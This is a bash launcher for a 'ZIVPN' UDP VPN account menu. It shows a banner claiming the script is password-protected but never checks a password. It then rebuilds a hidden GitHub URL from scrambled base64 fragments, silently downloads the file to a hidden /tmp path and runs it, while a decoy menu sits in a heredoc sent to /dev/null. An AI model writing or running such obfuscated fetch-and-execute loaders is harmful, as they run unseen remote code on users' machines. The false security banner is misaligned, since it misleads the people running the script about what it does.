#!/bin/bash

download_menu_script() {
  decode() {
    echo "$1" | base64 -d
  }

echo -e "${YELLOW}🔐  Secure Access Panel"
echo -e "${YELLOW}🔐  Script is protected by password"
echo -e "${YELLOW}🔐  To get the password, contact here @a_hamza_i"
echo -e "${YELLOW}🔐  Enter password to access:"
  p3=$(decode "aHR0cHM6")
  p2=$(decode "Ly8=")
  p1=$(decode "cmF3")
  p4=$(decode "LmdpdGh1Yg==")
  p5=$(decode "dXNlcmNvbnRlbnQuY29t")
  p6=$(decode "L2hxLW1w")
  p7=$(decode "L3ppLXZwbi5jb20=")
  p9=$(decode "L3JlZnMvaGVhZHM=")
  p8=$(decode "L21haW4vbWVudQ==")

function __load_base_components() {
  cat << 'ZMENU_X' > /dev/null
 ┌──────────────── HAMZA TECH ────────────────┐
      [1]  .  CREATE ACCOUNT UDP ZIVPN
      [2]  .  UNINSTALL SCRIPT ZIVPN
      [3]  .  START ACCOUNT ZIVPN
      [4]  .  STOP ACCOUNT ZIVPN
      [5]  .  RESTART ACCOUNT ZIVPN
      [6]  .  CHANGE DOMAIN SERVER
      [0]  .  EXIT ZIVPN
 └────────────────────────────────────────────┘
         Select From Options [ 1 - 6 ] :
 :
ZMENU_X
}
  full_url="${p3}${p2}${p1}${p4}${p5}${p6}${p7}${p9}${p8}"

  # تحميل الملف من الرابط النهائي وتخزينه مؤقتًا
  curl -s "$full_url" -o /tmp/.zi_menu

  # إعطاء الملف صلاحية التنفيذ
  chmod +x /tmp/.zi_menu

  # تشغيل الملف الذي تم تحميله
  bash /tmp/.zi_menu
}

download_menu_script
